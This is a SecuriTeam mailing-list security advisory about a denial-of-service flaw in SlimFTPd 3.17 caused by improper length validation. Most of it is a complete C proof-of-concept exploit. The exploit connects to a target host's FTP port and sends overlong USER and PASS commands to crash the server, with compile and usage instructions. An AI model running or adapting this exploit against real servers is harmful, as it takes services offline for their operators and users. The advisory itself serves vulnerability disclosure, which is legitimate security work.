[NT] Slim FTPd DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Slim FTPd DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://www.whitsoftdev.com/slimftpd/> SlimFTPd is a fully
standards-compliant FTP server implementation with an advanced virtual
file system."

Due to improper length validation by the SlimFTPd server, attackers can
cause the program to crash, effectively causing a DoS against the product.

DETAILS

Vulnerable Systems:
* SlimFTPd version 3.17

Exploit:
/*

Slim FTPd 3.17 Remote DoS PoC Exploit

Public proof of concept code by "Critical Security" http://www.critical.lt

Use for education only! Don't break the law...

Original Advisory may be found here:
http://www.critical.lt/?vulnerabilities/8
Exploit compiles without warnings on FreeBSD 5.4-RELEASE
Tested against Slim FTPd 3.17 on Windows XP SP 2

Compilation:

mircia$ uname -sr
FreeBSD 5.4-RELEASE-p6
mircia$ gcc this_file.c -o expl
mircia$ ./expl localhost
here goes output

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 21
#define USER "USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n" //
#define PASS "PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n" // Our
dirty requests ;)
#define QUIT "QUIT" // after all we just quit

int main(int argc, char *argv[]) {
register int s;
register int bytes;
struct sockaddr_in sa;
struct hostent *he;
char buf[BUFSIZ+1];
char *host;

if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror("pizute");
return 1;
}

bzero(&sa, sizeof sa);

sa.sin_family = AF_INET;

if (argc <= 1) {


printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");

} else {

host = (char *)argv[1];
sa.sin_port = htons(PORT);

if ((he = gethostbyname(host)) == NULL) {
perror(host);
return 2;
}

printf ("%s","\nCritical Security web-site: http://www.critical.lt\n");
printf ("%s","Slim FTPd 3.17 lame PoC DoS exploit.\n");
printf ("%s","greets to Lithuanian girlz :)\n\n");
printf ("%s%s%s","[*] Initiating attack against ",host, "\n");

bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);

if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
perror("connect");
return 3;
}

write(s,USER,sizeof USER); // dirty dirty dirty...
write(s,PASS,sizeof PASS);
write(s,QUIT,sizeof QUIT);

printf("%s","[*] Stuff sent, now wait for 30-120 seconds,\nserver should
crash, if's not - try again or write a better code :P\n");

close(s);
return 0;

}}

/* EoF */

ADDITIONAL INFORMATION

The information has been provided by <mailto:mircia@critical.lt> mircia .

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.